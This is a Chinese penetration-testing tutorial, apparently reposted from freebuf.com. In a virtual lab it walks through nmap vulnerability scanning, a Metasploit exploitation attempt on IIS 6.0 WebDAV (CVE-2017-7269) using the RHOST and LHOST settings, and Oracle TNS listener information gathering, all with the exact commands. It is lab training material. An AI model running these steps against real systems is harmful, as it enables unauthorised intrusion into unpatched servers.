查找漏洞信息并利用
我们在收集到漏洞信息以及服务器信息后,要在内网其他机器进行主机漏洞发现,并占据主机控制权限。首先我们要获取到主机的相关漏洞信息,可以通过nmap进行主机漏洞信息及版本探测。
实验环境:
虚拟攻击机:kali linux/10.10.10.138
虚拟被攻击服务器:windows2003/10.10.10.130和10.10.10.129
命令:nmap — script nmap-vulners –sV <目标IP>
在找到端口服务版本以及其包含的漏洞信息后,我们可以尝试进行查找漏洞相关信息,看能否利用。
同时可以通过nessus进行端口扫描以及主机漏洞探查。
例如:发现主机10.10.10.130主机为IIS6.0服务器,存在CVE-2017-7269漏洞。下面以该漏洞为实例进行利用
在metaspolit中iis_webdav_scstoragepathfromurl.rb模块可以进行IIS6_WebDAV远程代码执行漏洞利用。或者下载CVE2017-7269利用POC,将其存放到metaspolit模块下。我的模块路径在/opt/metasploit-framework/embedded/framework/modules/下。
Kali下首先启用metasploit:
命令:msfconsole
查找相关模块:
命令:search CVE2017-7269
使用CVE2017-7269 POC信息进行配置:
命令:use exploit/windows/iis/CVE2017-7269
如图所示:
使用set配置相关参数列表:
set RHOST 10.10.10.130(目的IP)
set LHOST 10.10.10.138(本机IP)
使用exploit执行,如图,没有session被创建后尝试利用其他漏洞。
尝试利用其他漏洞信息。
在nessus上发现有oracleTNS信息泄露。
尝试利用oracle TNS Listener Command Issuer
使用kali下输入命令msfconsole进入metasploit控制台,通过search查找oracle漏洞利用tnscmd,如图:进行配置
设置目标地址:
执行结果如下:
成功获取到目标信息。
来源:freebuf.com 2019-01-19 21:23:11 by: 凯信特安全团队
请登录后发表评论
注册